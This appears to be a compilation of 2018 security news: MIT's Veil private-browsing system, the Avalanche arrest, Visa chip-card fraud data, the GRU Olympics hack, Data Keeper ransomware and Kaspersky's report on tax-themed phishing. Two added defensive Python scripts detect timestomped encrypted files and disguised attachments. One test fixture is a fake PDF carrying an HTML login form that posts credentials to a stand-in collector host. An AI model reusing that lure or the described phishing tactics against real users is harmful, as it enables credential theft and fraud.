Dubbed Veil, the system proposes additional protections for people who share computers with other people at the office, in hotel business centers, or university computing centers. The new system, the researchers claim, can be used in conjunction with existing private-browsing systems and anonymity networks. The system works even if users don’t visit a page using a browser’s native privacy mode.

In a paper (PDF) describing Veil, Frank Wang – MIT Computer Science and Artificial Intelligence Laboratory (CSAIL), Nickolai Zeldovich – MIT CSAIL, and James Mickens – Harvard, explain that the system is meant to prevent information leaks “through the file system, the browser cache, the DNS cache, and on-disk reflections of RAM such as the swap file.”

The researchers explain that existing private-browsing sessions rely on retrieving data, loading it into memory, and attempting to erase it when the session is over. However, because of a complex memory management process, some data could end up on a hard drive, where it could remain for days, with the browser not knowing what happened to that data.

The newly proposed system keeps all the data that the browser loads into memory encrypted until it is displayed on the screen, the researchers say. Users no longer type a URL into the browser, but access the Veil website and enter the URL there. With the help of a blinding server, the Veil format of the requested page is transmitted.

While the Veil page can be displayed in any browser, there is a bit of code in the page that executes a decryption algorithm and all of the data associated with the page is unreadable until it goes through that algorithm, the researchers say.

The system would also add decoy, meaningless code to every served page, so that the underlying source file is modified without affecting the way the page looks to the user. Because no two transmissions of a page by the blinding server are alike, an attacker capable of recovering snippets of decrypted code after a Veil session should not be able to determine what page the user had visited.

“The blinding servers mutate content, making object fingerprinting more difficult; rewritten pages also automatically encrypt client-side persistent storage, and actively walk the heap to reduce the likelihood that in-memory RAM artifacts will swap to disk in cleartext form. In the extreme, Veil transforms a page into a thin client which does not include any page-specific, greppable RAM artifacts,” the paper reads.

One other option would be to have the blinding server open the requested page itself, take a picture of it, and send the picture to the user’s computer. Should the user click anywhere on the image, the browser records the position of the click and sends the data to the server, which processes it and returns an image of the updated page.

Veil uses an opt-in model, meaning that the use of the new private browsing system requires developers to create Veil versions of their sites. To help in this regard, the researchers built a compiler that helps admins convert sites automatically and that is also capable of uploading the converted version of a site to a blinding server.

“To publish a new page, developers pass their HTML, CSS, and JavaScript files to Veil’s compiler; the compiler transforms the URLs in the content so that, when the page loads on a user’s browser, URLs are derived from a secret user key. The blinding service and the Veil page exchange encrypted data that is also protected by the user’s key. The result is that Veil pages can safely store encrypted content in the browser cache; furthermore, the URLs exposed to system interfaces like the DNS cache are unintelligible to attackers who do not possess the user’s key,” the paper reads.

The blinding servers, however, require maintenance, either by a network of private volunteers or a for-profit company. However, site admins would also have the option to host Veil-enabled versions of their sites themselves.

Ukraine Arrests 'Avalanche' Cybercrime Organizer: Police
26.2.2018 securityweek CyberCrime

Ukraine has detained one of the organizers of the massive Avalanche cybercrime network, police said on Monday, over a year after the global ring was busted in an international raid.

"An organizer of the international crime platform known as 'Avalanche' which infected up to half a million computers in the world daily was detained in Kiev Sunday," Ukraine's cyber police said in a statement.

Avalanche was a criminal network providing infrastructure for malware and DDoS (distributed denial of service) spam attacks across the world before it was busted in an unprecedented global sting operation.

Speaking to AFP, a cyber police spokeswoman confirmed the arrested man was Gennadiy Kapkanov, a Ukrainian citizen who was using a passport with a different identity.

Police also searched his rented flat, seizing a laptop and memory storage devices, the statement said.

In November 2016, police from more than 25 countries smashed the network and arrested its top bosses following a four-year operation.

Hundreds of servers were shut down or seized and 800,000 internet domains were blocked, Europol said at the time, in one of the biggest takedowns to date.

During the operation, Kapkanov was also detained in the sting at his home in Poltava, a city in central Ukraine, but the local court did not formally arrest him and he disappeared, Ukrainian media said.

Later on Monday, the same court will have to rule again on whether to formally place Kapkanov under arrest.

VISA – The adoption of chip-and-PIN card technology lead to 70% Drop in Counterfeit Fraud
26.2.2018 securityaffairs Crime

VISA – Cases of counterfeit fraud had dropped by 70% in September 2017 compared to December 2015 thanks to the adoption by storefronts of payment systems for EMV cards.
The introduction of chip-and-PIN card technology in the United States improved in a significant way the security of merchants and has reduced payment card fraud.


“For merchants who have completed the chip upgrade, counterfeit fraud dollars [...] in September 2017 compared to December 2015,” states VISA.

EMV chip cards and chip-activated merchants combat counterfeit fraud in the U.S. (figure from the December 2017 Visa Chip Card Update)

The process started in 2011 with the introduction of EMV (Europay, MasterCard, Visa) card technology in the United States.

The process was very slow: according to Visa, by September 2015 only roughly 392,000 merchants were accepting payment cards using the new technology, and in the same period the number of Visa debit and credit cards using the EMV technology was only 159 million.

Now Visa has shared data related to the adoption of the EMV technology by December 2017. The number of storefronts that currently accept payments with chip cards has reached 2.7 million in the U.S. (+570%), representing 59% of the total.


The number of Visa payment cards using EMV technology increased from 159 million to 481 million (+202%), with 67% of Visa payment cards having chips.

It is an excellent result; according to Visa, chip transactions continue to increase in the US. EMV cards accounted for 96% of the overall payment volume in the United States in December 2017, with chip payment volume reaching $78 billion.


Cybercriminals have responded to the adoption of EMV chip cards by focusing their efforts on card-not-present (CNP) fraud, which is today a serious concern for merchants.

Chip Cards Lead to 70% Drop in Counterfeit Fraud: Visa
26.2.2018 securityweek Crime

The adoption of chip-and-PIN card technology by an increasing number of merchants in the United States has led to a significant drop in cases of counterfeit card fraud, according to Visa.

The financial industry has been pushing for the adoption of EMV (Europay, MasterCard, Visa) card technology in the United States since 2011, and efforts were increased following the disclosure of the massive data breach suffered by Target in 2013.

However, according to Visa, by September 2015, only roughly 392,000 merchant locations had been accepting chip cards, and the number of Visa debit and credit cards using this technology was only at 159 million.

Data collected by Visa shows the number of storefronts that had migrated to EMV technology by December 2017 increased by more than 570%, with 2.7 million storefronts in the U.S., representing 59% of the total, accepting chip cards. The number of Visa cards using chip technology increased by 202% to 481 million, with 67% of Visa payment cards having chips.

Visa also reported that EMV cards accounted for 96% of the overall payment volume in the United States in December 2017, with chip payment volume reaching $78 billion.

As a result of U.S. merchants upgrading their payment systems for EMV cards, cases of counterfeit fraud had dropped by 70% in September 2017 compared to December 2015.

While the adoption of chip and PIN technology addresses the problem of counterfeit card fraud, it has not deterred fraudsters, who have simply shifted their focus to card-not-present (CNP) and other types of fraud.

A study released roughly one year ago by Forter showed that there had been a significant increase in CNP fraud and account takeover (ATO) attacks. Specifically, in the case of ATO, while the number of attacks targeting merchant sites had decreased, there had been a growing trend in ATO attacks on online payment accounts.

A study released in September 2017 by Vesta showed that CNP fraud had been a serious concern for 85% of merchants, with roughly one-third showing increased concern.

Torsten George, strategic advisory board member at vulnerability risk management firm NopSec, warned in a SecurityWeek column last year that EMV does not address more sophisticated cyber attacks that target backend systems storing cardholder data.

“Security is no longer just about protecting the network and endpoints, but must extend to the database and application layers to name a few,” George explained at the time. “That’s why, in addition to their work to advance EMV adoption, banks and payment processors should implement cyber risk management practices to identify their attack surface exposure and quickly prioritize remediation of the security gaps with the potential to have the biggest business impact if exploited.”

Pyeongchang – Russia’s GRU military intelligence agency hacked Olympics Computers
26.2.2018 securityaffairs BigBrothers

Pyeongchang – Russia’s GRU military intelligence agency hacked Olympics computers and conducted a false flag operation to make it appear that the attack originated in North Korea.
On February 9, shortly before the Pyeongchang opening ceremonies on Friday, televisions at the main press centre, wifi at the Olympic Stadium and the official website were taken down.

According to The Washington Post, the incidents were caused by cyber attacks powered by hackers working at Russia’s GRU military intelligence agency that managed to take control in early February of 300 computers linked to the Olympic organization.

The cyber attacks were a retaliation against the International Olympic Committee for banning the Russian team from the Winter Games due to doping cases of Russian athletes.

“Analysts surmise the disruption was retaliation against the International Olympic Committee for banning the Russian team from the Winter Games due to doping violations. No officials from Russia’s Olympic federation were allowed to attend, and while some athletes were permitted to compete under the designation “Olympic Athletes from Russia,” they were unable to display the Russian flag on their uniforms and, if they won medals, their country’s anthem was not played.” reported The Washington Post.

“As of early February, the Russian military agency GRU had access to as many as 300 Olympic-related computers, according to an intelligence report this month.

The Office of the Director of National Intelligence declined to comment.”


The cyber attacks caused severe problems for the Olympic organization: many attendees were unable to print their tickets for the ceremony and were not able to participate in the event.

According to the authorities, it was sabotage: Russian cyber soldiers compromised South Korean computer routers and implanted a strain of “malware” that paralyzed the network.

To make attribution of the attack harder, Russian hackers conducted a false flag operation to make it appear that the attack originated in North Korea.

“Russian military spies hacked several hundred computers used by authorities at the 2018 Winter Olympic Games in South Korea, according to U.S. intelligence.” continues the Washington Post.

“They did so while trying to make it appear as though the intrusion was conducted by North Korea, what is known as a “false-flag” operation, said two U.S. officials who spoke on the condition of anonymity to discuss a sensitive matter.”

Data Keeper Ransomware – An unusual and complex Ransom-as-a-Service platform
26.2.2018 securityaffairs

The Data Keeper Ransomware that infected systems in the wild was generated by a new Ransomware-as-a-Service (RaaS) service that appeared in the underground recently.
A few days ago a new Ransomware-as-a-Service (RaaS) service appeared in the underground; now samples of the malware, dubbed Data Keeper Ransomware, generated with the platform have already been spotted in the wild.

The Data Keeper ransomware was discovered by researchers at Bleeping Computer last week.

Catalin Cimpanu on Twitter:
New Dark Web RaaS. Currently offline, but to keep an eye on.
4:24 PM - Feb 20, 2018

“The service launched on February 12 but didn’t actually come online until February 20, and by February 22, security researchers were already reporting seeing the first victims complaining of getting infected.” reads the blog post published by Bleeping Computer.

Anyone can sign up for the RaaS service and activate his account for free and create their samples of the ransomware.

The ransomware encrypts the files with a dual AES and RSA-4096 scheme, and it also attempts to encrypt all network shares. Once the files are encrypted, the malicious code places a ransom note (“!!! ##### === ReadMe === ##### !!!.htm“) in each folder in which it encrypted files.

The operators behind the Data Keeper RaaS ask their users to generate their samples and distribute them; in turn, they offer a share of the ransom fee when victims pay the ransom. It is not clear what percentage of the ransom is offered to the user.

Affiliates just need to provide the address of their Bitcoin wallet, generate the encryptor binary, and download the malware along with a sample decrypter.

According to the researchers at MalwareHunterTeam who analyzed the ransomware, although it is written in .NET, its quality is high.

MalwareHunterTeam on Twitter:
So, looked at DataKeeper ransomware...
Important / notable things:
- it's secure
- it's one of the few RWs that uses PsExec & it should be the 1st .NET RaaS that uses PsExec at all
- not seen any .NET ransomware before which was protected like this. @BleepinComputer @demonslay335
8:40 PM - Feb 22, 2018

The ITW sample we saw yesterday consists of 4 layers:
First layer is an exe, which will drop another exe to %LocalAppData% with random name & .bin extension, then executes it (WindowStyle.Hidden, Priority.BelowNormal).
That 2nd exe will load a dll, which will load another dll.
10:52 AM - Feb 23, 2018

All layers have a custom strings and resources protection. And then each layer is protected with ConfuserEx.
Sounds like someone is paranoid...
11:11 AM - Feb 23, 2018

The Data Keeper ransomware is complex, it is one of the few ransomware strains that use the PsExec tool. The Data Keeper ransomware uses the PsExec to execute the malicious code on other machines on the victims’ networks.

An interesting characteristic implemented by the Data Keeper ransomware is that it doesn’t append an extension to the names of the encrypted files.

MalwareHunterTeam on Twitter, quoting the Bleeping Computer article “Data Keeper Ransomware Makes First Victims Two Days After Release on Dark Web RaaS” by @campuscodi (https://www.bleepingcomputer.com/news/security/data-keeper-ransomware-makes-first-victims-two-days-after-release-on-dark-web-raas/):
To extend what is mentioned on the screenshot, it not only does not add an extension, but when encrypting a file, it first reads the lastWriteTime value of it, and after encryption it sets back that value, so you can't even find encrypted files this way...
2:13 PM - Feb 24, 2018

With this trick, victims cannot tell which files are encrypted by looking at extensions or modification dates; they only find out when they try to open one.

“This is actually quite clever, as it introduces a sense of uncertainty for each victim, with users not knowing the amount of damage the ransomware has done to their PCs.” continues Bleeping Computer.
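Restoring the last-write time defeats the obvious "sort by date modified" triage, but not every signal can be put back from user mode. The script below is an added example for this page, not code from the article or from the ransomware. It demonstrates two checks that survive the trick: the change time (st_ctime on POSIX; the equivalent on NTFS is the "MFT entry modified" field of $STANDARD_INFORMATION, which SetFileTime cannot set), and the Shannon entropy of the content, which jumps to nearly 8 bits per byte once a file is encrypted. The demo builds its own scratch file and stands in for the encryption with random bytes; the file name and contents are invented. Note the platform caveat in the comments: on Windows, Python's os.stat reports the creation time as st_ctime, so the timestamp check there needs an MFT parser rather than os.stat.

```python
"""Finding files that were rewritten but had their last-write time put back.

Added example, not from the article and not the ransomware's code. Two signals
survive the mtime restoration described in the tweet above:
  1. the change time (st_ctime on POSIX; on NTFS the $STANDARD_INFORMATION
     "MFT entry modified" field), which utime()/SetFileTime() cannot backdate,
     so it still records when the rewrite happened;
  2. Shannon entropy of the content, which rises to nearly 8 bits/byte after
     encryption regardless of any timestamp.
Platform caveat: on Windows os.stat() reports creation time as st_ctime, so
signal 1 there has to come from the MFT, not from os.stat().
"""
import math
import os
import tempfile
import time
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def timestomp_suspect(path: str, slack: float = 2.0) -> bool:
    """True when the change time is noticeably later than the last-write time,
    i.e. something modified the file and then set its mtime back."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack


def assess(path: str, entropy_threshold: float = 7.5) -> dict:
    """Both signals for one file; reads at most the first MiB."""
    with open(path, "rb") as f:
        sample = f.read(1 << 20)
    ent = shannon_entropy(sample)
    return {"entropy": ent, "high_entropy": ent > entropy_threshold,
            "timestomped": timestomp_suspect(path)}


def demo() -> dict:
    """Emulate the behaviour on a scratch file: overwrite it, then restore mtime.

    A genuinely day-old file would also have a day-old ctime; we cannot backdate
    ctime from user space, so the timestomp signal is only evaluated after the
    rewrite, which is the case that matters in a hunt anyway."""
    scratch_dir = tempfile.mkdtemp()
    path = os.path.join(scratch_dir, "Q4_report.txt")      # constructed sample
    with open(path, "w") as f:
        f.write("Quarterly revenue report, draft 3\n" * 200)
    a_day_ago = time.time() - 86400
    os.utime(path, (a_day_ago, a_day_ago))                 # pretend it is a day old
    mtime_before = os.stat(path).st_mtime_ns
    entropy_before = shannon_entropy(open(path, "rb").read())

    # What the ransomware does: rewrite the content, then put mtime back.
    with open(path, "wb") as f:
        f.write(os.urandom(4096))                          # stands in for ciphertext
    os.utime(path, (a_day_ago, a_day_ago))

    after = assess(path)
    return {"mtime_unchanged": os.stat(path).st_mtime_ns == mtime_before,
            "entropy_before": entropy_before,
            "entropy_after": after["entropy"],
            "high_entropy": after["high_entropy"],
            "timestomped": after["timestomped"]}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In a real hunt you would walk the tree with os.walk and apply assess() to every file; high entropy alone also matches archives and media, so pairing it with the ctime gap (or, on NTFS, with a $STANDARD_INFORMATION/$FILE_NAME comparison from an MFT parser) is what separates encrypted documents from ordinary compressed ones.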

Another peculiarity of this RaaS platform is that affiliates can choose which file types to encrypt; they can also set the ransom amount.

The platform uses a payment service hosted on the Tor network, a common choice for ransomware operations.

According to the researchers, many crooks have already signed up for the Data Keeper RaaS and are distributing weaponized binaries in the wild.

MalwareHunterTeam told Bleeping Computer that one of the groups distributing the ransomware is hosting the malicious binaries on the server of a home automation system.

Further technical details and the Indicators of Compromise (IOCs) are included in the post published by Bleeping Computer.

Other RaaS services have been spotted by experts in the underground recently: GandCrab and Saturn were discovered in the last few weeks.

Russia Hacked Olympics Computers, Turned Blame on North Korea: Report
26.2.2018 securityweek BigBrothers

Russian military spies hacked hundreds of computers used by Winter Olympics organizers and tried to make it look like the work of North Korea, the Washington Post reported Sunday, quoting US intelligence sources.

South Korea had previously announced that it was investigating the failure of several Olympic-linked internet sites and broadcast systems just as the opening ceremonies were taking place on February 9.

The Post reported that Russia's GRU military intelligence agency managed to take control in early February of 300 computers linked to the Olympic organization.

As a result, many attendees were unable to print their tickets for the ceremony, leaving empty seats.

It said the Russians had hacked South Korean computer routers and inserted a form of "malware" that allowed them to gather data and paralyze the network.

The Russians used a North Korean internet provider to make it appear the attack originated in North Korea, in what is known as a "false flag" operation, the Post said.

While American officials quoted in the article were unable to say whether the hackers had activated the malware, they said the cyber attack against the Games -- from which Russia's team was excluded for doping -- was worrisome.

Some analysts believe the cyber attack was retribution for that ban. Some Russian athletes were allowed to compete, but only under the designation of "Olympic Athletes from Russia."

The Winter Games saw dramatic gestures aimed at easing the raw tensions dividing the two Koreas, as both countries' athletes marched together during the opening ceremonies, and they fielded a single women's ice hockey team.

The sister of North Korean leader Kim Jong-Un made several high-profile appearances in the early days of the Games, and a large squad of North Korean cheerleaders drew intense interest.

Finally, at the Games' closing ceremony Sunday, South Korean President Moon Jae-in and North Korean General Kim Yong Chol -- a man considered a "war criminal" by many in the South for his role in two deadly attacks on Southern targets -- exchanged a very public handshake.

Microsoft Data Warrant Case in Top US Court Has Global Implications
26.2.2018 securityweek BigBrothers

Microsoft faces off with the US government before the Supreme Court Tuesday over a warrant for data stored abroad that has important ramifications for law enforcement in the age of global computing.

The case, which dates back to 2013, involves a US warrant ordering Microsoft to turn over the contents of an email account used by a suspected drug trafficker, whose data is stored in a cloud computing center in Ireland.

It has been watched closely because of its implications for privacy and surveillance in the digital age, and specifically how law enforcement can reach across borders to obtain digital evidence that may be scattered across the globe.

Microsoft has maintained that US courts lack jurisdiction over the data stored in Ireland.

The US tech giant, backed by many firms in the sector and civil liberties groups, argues the case is critical in showing that American authorities cannot simply request such data via a warrant without going through the process set out in law enforcement treaties between countries.

- The Snowden effect -

Microsoft president Brad Smith told reporters last week the principle is especially relevant after former intelligence contractor Edward Snowden leaked details on global US surveillance programs in 2013.

"We've always said it was important to win this case to win the confidence of people around the world in American technology," Smith said in a conference call.

Smith said officials in Europe have been notably concerned about the implications of a decision in favor of the US government, and that was made clear during a discussion with a German official on the case after a lower judge ruled against Microsoft.

"He said that unless we persist with this lawsuit and turned it around, no German state would ever store data in a data center operated by an American company," Smith said.

Last year, a federal appeals court sided with Microsoft, overturning a district judge ruling.

Yet the case is complicated by the intricacies of cloud computing, which allow data to be split up and stored in multiple locations around the world even for a single user, and some analysts say the court has no good solution.

"The speed by which data can be moved about the globe, the fact of third-party control and the possibility of data being held in locations that have absolutely no connection to either the crime or target being investigated makes location of the 0s and 1s that comprise our emails a particularly poor basis for delimiting jurisdiction," American University law professor Jennifer Daskal wrote on the Just Security blog.

"Conversely, there is a real risk that a straight-up US government win will -- rightly or wrongly -- be perceived around the world as US law enforcement claiming the right to access data anywhere, without regard to the countervailing sovereign interests. This creates a precedent that foreign nations are likely to mimic."

- 'Larger problem' -

Both sides have said that any court decision may be flawed, and that Congress needs to address the issue by rewriting the 1986 Stored Communications Act at issue.

Microsoft's Smith said he was encouraged by a bill introduced this year called the CLOUD Act that would authorize cross-border data warrants with countries that meet certain standards for privacy and civil liberties.

The proposal has the backing of the tech sector, according to Smith, and respects the laws of each country where a request is made.

John Carlin, a former assistant US attorney general for national security, agreed that a legislative solution is preferable.

"Regardless of how this case turns out, it's not going to solve the larger problem," Carlin said.

Carlin said current laws governing crimes with cross-border components were not designed for the digital age.

"The problem now is there is a lack of clarity over how you can serve traditional legal process for what used to be local crimes," he added. Carlin said the CLOUD bill could address the issues because it "provides incentives for countries that have protections for civil liberties."

But some civil liberties activists have expressed concern the measure would expand US surveillance capabilities.

The measure "would give unlimited jurisdiction to US law enforcement over any data controlled by a service provider, regardless of where the data is stored and who created it," said Camille Fischer of the Electronic Frontier Foundation.

It also "creates a dangerous precedent for other countries who may want to access information stored outside their own borders, including data stored in the United States," she said.

Tax refund, or How to lose your remaining cash
25.2.2018 Kaspersky
Every year, vast numbers of people around the globe relish the delightful prospect of filling out tax returns, applying for tax refunds, etc. Given that tax authorities and their taxpayers are moving online, it’s no surprise to find cybercriminals hard on their heels. By spoofing trusted government agency websites and luring users onto them, phishers try to collect enough information to steal both money from victims’ accounts and their digital identity.

Attackers employ standard methods that basically center on creating phishing sites and web pages. Such resources can prompt for passwords to “My Account” areas on the websites of local tax services, answers to security questions, names and dates of birth of relatives, bank card details, and much more besides. In addition to the information that users unwittingly hand over themselves, scammers often harvest extra details such as the victim’s IP address and location, browser name and version, and operating system: anything that increases the chances of getting past the anti-fraud checks protecting the victim’s accounts, which typically compare the device and location of a login with what they have seen before.

Phishing pages can also spread malware under various guises. Fraudsters don’t shy away from direct extortion under the cloak of tax agents — such attacks have occurred in the US, France, Canada, Ireland, and elsewhere. Let’s examine the most common tax-phishing schemes in more detail.

Canada (CRA)
In Canada, the body responsible for tax collection and administration is the Canada Revenue Agency (CRA). The deadline for filing tax returns for the past financial year is April 30. The figure below shows phishing activity in 2016 spiking in the days leading up to this deadline, and only abating in May.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the CRA brand, 2016

A slightly different picture is observed on the 2017 graph:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the CRA brand, 2017

A surge came when many Canadians were expecting a tax refund of some sort. We registered a huge number of phishing pages informing people that they were entitled to receive a certain amount of money. It was mostly these messages that distributed links to fake CRA pages where victims were asked to fill out a web form.

Example of a phishing letter allegedly from the CRA with a fake notification about a potential refund.

Typically, such pages are almost a carbon copy of the official CRA site and request a large amount of personal information. If the user doesn’t doubt the site’s authenticity, he or she will have no qualms about filling in the many fields. As a result, the attackers get hold of valuable information, while users are notified of a two-day wait while their data is “processed.” For added plausibility, the victim can be redirected to the original CRA site.

Among the information that the fraudsters collect are bank card details (including PIN code), social security number, driver’s license number, address, telephone number, date of birth, mother’s maiden name, and employer. The attackers also retrieve the IP address and system information.

Example of a phishing page masquerading as a CRA site. When all personal information is entered and the form is submitted, the script generates an email with all the data input (as well as the victim’s IP address and data received from the User Agent) and sends it to the specified address

Criminals do not focus solely on tax declarations and refunds. They make repeated attempts throughout the year to extract data under the guise of the CRA. For example, one of the emails we found invited the recipient to view information about a “tax incident,” prompting them to enter a login and password for a Dropbox account, or provide email credentials. After that, the victim clicked a button to download a public PDF document with information about alleged changes to the tax legislation. The data entered was forwarded to the scammers.

Example of tax and CRA-themed phishing to get Dropbox and mail credentials

Scammers do not restrict themselves to fake sites and emails. They also send out SMS messages and even call victims pretending to be from the CRA, demanding urgent payment of debts by wiring money to a certain account. Such calls are often accompanied by intimidation (threats of penalties, fines, and even imprisonment are used).

Taxpayers in Canada should remember that the CRA never sends emails containing links or requests for personal data, except when an email is sent directly during a telephone conversation with a CRA agent.

CRA recommendations on how to avoid scams are available on its official site under Security.

United States (IRS)
In the US, the tax body is the Internal Revenue Service (IRS), and the tax return deadline is normally April 15, shifted by a few days when that date falls on a weekend or holiday (it was April 18 in both 2016 and 2017). In 2016, as in Canada, a major fraud outbreak occurred in the run-up to the deadline:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the IRS brand, 2016

However, we observed bursts of scamming activity throughout the year. That made it difficult to single out a specific moment in 2017, save for a notable pre-New Year spike:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the IRS brand, 2017

Scammers use a range of topics to bait US taxpayers: tax refund, personal information update, account confirmation, etc.

Examples of fake IRS emails

Tax refund forms are a very popular tool for phishers in the US, and scam sites that exploit this method typically appear at the start of the tax return period. The amount of data they steal is staggering: anything they can and more besides. They exploit users’ very strong urge to claw back some of their hard-earned cash.

Fake IRS pages prompting users to fill out a tax refund form

An information leak on this scale might not only empty the victim’s bank accounts, but lead to a host of other problems, including targeted attacks and attempts to access other accounts. Whereas a compromised bank card is easily blocked and reissued, one’s address, social security number, date of birth, and mother’s maiden name are rather less flexible.

Another way to dupe victims is to send a fake tax service message containing a link to confirm their account, update personal information, or restore their password:

Examples of phishing pages using the IRS brand

After the data is forwarded to the scammers, the victim is usually redirected to the original site not to arouse suspicions:

Example of a phishing script sending user data to a fraudulent email address. If the information is successfully forwarded, the victim is redirected to the original tax service website

Besides the IRS brand, scammers use the name of Intuit, the developer of the TurboTax program, which helps fill out tax returns.

Example of a phishing email using the Intuit brand

Scammers try to get user credentials for the Intuit site, as well as email logins and passwords:

Examples of phishing pages using the Intuit brand

Links to phishing pages in the US are distributed not only by email, but by SMS and social media. Remember that the IRS doesn’t initiate contact with taxpayers through these channels to request personal information.

Official IRS anti-phishing recommendations are available on the department’s website.

United Kingdom (HMRC)
The UK tax (fiscal) year runs from April 6 through April 5 the following year. The PAYE (Pay As You Earn) system means that most taxpayers are not required to fill out any forms by a certain deadline (HMRC receives monthly data from the employer). However, if a taxpayer’s income changes, they must notify HMRC so that their tax code is updated in accordance with the new income level. And in the event that the taxpayer owes money or is due a reimbursement, HMRC (Her Majesty’s Revenue and Customs) will make contact to arrange payment. That’s where scammers set traps informing potential victims about a potential refund or (less often) monies owed.

In 2016, phishing activity in this segment in the UK was very high, rising toward the end of the calendar year:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites exploiting the name of the UK’s HMRC, 2016

In 2017, phishers cast their nets in May (this month saw two major outbreaks of activity) and remained active pretty much until the end of the calendar year.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites exploiting the name of the UK’s HMRC, 2017

Scam messages supposedly from HMRC reach UK residents via SMS, social media, and email, and contain links to phishing pages that strongly resemble the official website. To claim their “refund,” users are usually asked to enter bank card details and other important information.

Examples of phishing pages using the HMRC brand.

In addition, scammers try to steal credentials for other services. In the example below, the scammers sent an email seemingly from HMRC with a PDF attachment (in fact an HTML file). On opening it, the user is shown a page in the style of an Adobe online resource, and is prompted for an email login and password to view the PDF. These credentials are, of course, sent to the attackers.

A fake PDF directing victims to a page used by cybercriminals to steal email account credentials
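The “PDF that is really an HTML file” lure works because clients and users trust the attachment name. A mail gateway or a triage script can refuse to trust it and look at the bytes instead. The following is an added example written for this page, not code from Kaspersky or from any phishing kit: it builds a constructed message with a fake .pdf attachment that is actually an HTML credential form (sender, recipient and the collector URL are invented, using .invalid names), plus a minimal genuine PDF, then sniffs the magic bytes of each attachment and reports where the extension, the declared MIME type and the real content disagree.

```python
"""Check that an e-mail attachment really is what its name claims.

Added example, not from the Kaspersky article. The lure described above is an
HTML file delivered under a .pdf name; the mail client trusts the name, the
browser renders the HTML. Sniffing the first bytes and comparing them with the
extension and the declared MIME type catches that offline, without opening the
file. The message below is constructed for the demo; all addresses are fake.
"""
import email
from email import policy
from email.message import EmailMessage


def sniff(data: bytes) -> str:
    """Classify content by magic bytes; 'unknown' if nothing matches."""
    head = data.lstrip()[:64].lower()
    if data.startswith(b"%PDF-"):
        return "pdf"
    if head.startswith((b"<!doctype html", b"<html", b"<script", b"<head")):
        return "html"
    if data.startswith(b"PK\x03\x04"):
        return "zip"          # also docx/xlsx/jar containers
    if data.startswith(b"MZ"):
        return "pe"
    return "unknown"


# What each extension should look like on the inside.
EXT_EXPECTED = {"pdf": "pdf", "html": "html", "htm": "html",
                "docx": "zip", "xlsx": "zip", "zip": "zip", "exe": "pe"}


def audit_attachments(raw: bytes) -> list:
    """One finding per attachment: name, extension, declared MIME type,
    sniffed type, and whether extension and content disagree."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        payload = part.get_payload(decode=True) or b""
        sniffed = sniff(payload)
        expected = EXT_EXPECTED.get(ext)
        findings.append({"name": name, "ext": ext,
                         "declared": part.get_content_type(),
                         "sniffed": sniffed,
                         "mismatch": expected is not None and sniffed != expected})
    return findings


def build_sample() -> bytes:
    """Constructed lure: a .pdf attachment that is really an HTML login page,
    plus a minimal genuine PDF so the check has a clean case to compare."""
    msg = EmailMessage()
    msg["From"] = "HMRC Refunds <noreply@example.invalid>"
    msg["To"] = "taxpayer@example.invalid"
    msg["Subject"] = "Your tax refund document"
    msg.set_content("Please open the attached document to claim your refund.")
    fake_pdf = (b"<!DOCTYPE html><html><body>"
                b"<form action='https://collector.invalid/post'>"
                b"Sign in with your e-mail account to view the PDF"
                b"<input name='user'><input name='pass' type='password'></form>"
                b"</body></html>")
    msg.add_attachment(fake_pdf, maintype="application", subtype="pdf",
                       filename="Tax_Refund_Notice.pdf")
    real_pdf = (b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\n"
                b"trailer<</Root 1 0 R>>\n%%EOF\n")
    msg.add_attachment(real_pdf, maintype="application", subtype="pdf",
                       filename="Guidance.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in audit_attachments(build_sample()):
        print(finding)
```

The declared MIME type is recorded but deliberately not trusted: the sender controls it just as much as the filename, which is why the verdict is based on the sniffed content versus the extension the recipient will see.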

Anti-phishing recommendations can be viewed on the official HMRC website.

France (DGFiP, impots.gouv.fr)
In France, tax collection is the responsibility of the General Directorate of Public Finance (Direction générale des Finances publiques, DGFiP); the start of the fiscal year coincides with that of the calendar year. France has no PAYE system (one is planned for 2019), and the deadline for tax returns is set per département. Tax declarations can be filed on paper (soon to be discontinued) or online, and the paper deadline is earlier than the electronic one. Generally, the submission deadlines fall in May-June.

As we can see on the graphs, phishing activity surged during this very period:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to fake DGFiP phishing sites, 2016

2017 saw two flashes of activity: during the filing period and at the end of the year:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to fake DGFiP phishing sites, 2017

The most popular topic for scammers, as before, is the offer of a refund:

Example of a phishing email exploiting the subject of tax refunds

Clicking on links in such messages takes users to phishing pages where they are prompted to enter bank card details and other personal information:

Examples of fake pages masquerading as the French tax service

Official warning about scammers on the DGFiP website.

Other countries
Taxes are a common scamming topic in other countries, too. Personal information is solicited for under various pretexts: tax return completion, account verification, tax refund, system registration, etc.

Example of a fake page of the Revenue Commissioners of the Republic of Ireland

Scammers not only target taxpayers’ personal data, but sometimes aim to install malware on their computers. For example, one spam mailing contained a link to a fake site of the Federal Tax Service (FTS) of the Russian Federation, where a Trojan was downloaded to the victim’s computer.

A spoof FTS site distributing malware

Not only taxes
Posing as the state, attackers have other topics than taxes up their sleeve. For example, scammers in Hungary held fake prize giveaways in the name of the government:

Smartphone giveaway by the “Hungarian government”

In Italy, fraudsters rather ingeniously extorted money under the guise of the Ministry of Defense. To conceal its real address, the site opened (if the user allowed it) in full-screen mode with the control elements and address bar hidden, and then proceeded to simulate these interface elements. Naturally, the fake address bar displayed the Ministry’s legitimate URL.

Fake Italian “Ministry of Defense” website

